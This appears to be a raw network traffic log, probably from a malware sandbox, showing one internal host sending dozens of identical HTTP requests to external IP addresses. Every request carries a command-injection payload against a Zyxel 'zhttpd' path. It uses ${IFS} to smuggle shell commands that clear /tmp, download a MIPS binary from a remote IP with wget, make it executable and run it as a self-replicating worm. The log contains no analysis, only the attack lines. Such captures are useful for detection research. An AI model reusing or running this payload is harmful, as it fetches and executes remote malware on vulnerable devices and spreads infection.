                                                Jan 12, 2024 18:16:17.303884983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3001192.168.2.2336420126.22.186.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303930998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3002192.168.2.2349164164.116.161.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303949118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3003192.168.2.2357246131.15.253.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303981066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3004192.168.2.2336480218.236.39.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304028988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3005192.168.2.2335526131.48.59.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304069042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3006192.168.2.233339660.129.193.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304116964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3007192.168.2.2351962141.58.45.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304143906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3008192.168.2.2360922144.198.22.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304188967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3009192.168.2.2348324101.221.192.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304231882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3010192.168.2.2352506212.150.100.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304274082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3011192.168.2.23558862.173.113.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304316044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3012192.168.2.2341594139.168.155.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304358006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3013192.168.2.234785213.193.183.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304405928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3014192.168.2.2342488105.168.241.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304446936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3015192.168.2.233489213.166.57.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304480076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3016192.168.2.235192091.120.221.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304533005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3017192.168.2.234322247.248.154.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304574966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3018192.168.2.2337518136.72.90.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304604053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3019192.168.2.234348469.238.157.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304657936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3020192.168.2.2334916113.201.69.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304681063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3021192.168.2.234027431.17.234.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304723978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3022192.168.2.2352096198.14.175.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304764986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3023192.168.2.2350456208.62.46.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304800034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3024192.168.2.2360624176.181.94.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304824114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3025192.168.2.233456273.111.209.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304846048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3026192.168.2.2336464179.149.223.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304887056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3027192.168.2.2342550151.227.207.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304934025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3028192.168.2.2340172204.225.9.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.304970980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3029192.168.2.234481650.201.209.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305000067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3030192.168.2.234147097.177.127.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305046082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3031192.168.2.2356138142.34.251.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305072069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3032192.168.2.234102817.247.229.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305143118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3033192.168.2.235463472.48.185.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305167913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3034192.168.2.2338332120.3.141.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305212021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3035192.168.2.2350654165.14.37.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305254936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3036192.168.2.2338650158.118.146.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305279016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3037192.168.2.234435669.187.253.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305347919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3038192.168.2.2352794160.125.47.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305397987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3039192.168.2.235581894.39.21.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305417061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3040192.168.2.233571294.95.85.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305469990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3041192.168.2.2351748223.10.30.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305489063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3042192.168.2.2337228123.26.57.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305552006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3043192.168.2.2355524216.230.45.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305583000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3044192.168.2.2353512172.9.93.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305610895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3045192.168.2.233823863.145.36.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305655003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3046192.168.2.2342166222.49.42.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305691004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3047192.168.2.2345450137.248.148.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305731058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3048192.168.2.2335196134.139.149.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305774927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3049192.168.2.233442098.125.55.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305811882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3050192.168.2.2351812100.41.236.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305856943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3051192.168.2.234839693.68.54.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305898905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3052192.168.2.235120034.56.159.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305942059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3053192.168.2.2342096153.66.35.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.305994034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3054192.168.2.2359526203.38.191.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306040049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3055192.168.2.234580689.202.138.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306051016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3056192.168.2.235173425.95.142.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306101084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3057192.168.2.2355152105.28.242.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306144953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3058192.168.2.2357808159.163.84.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306188107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3059192.168.2.2357550191.43.223.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306250095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3060192.168.2.2348284186.238.198.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306272030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3061192.168.2.2340594156.158.76.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306307077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3062192.168.2.235500484.196.201.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.306339025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3063192.168.2.2338494111.137.4.132443
                                                TimestampBytes transferredDirectionData
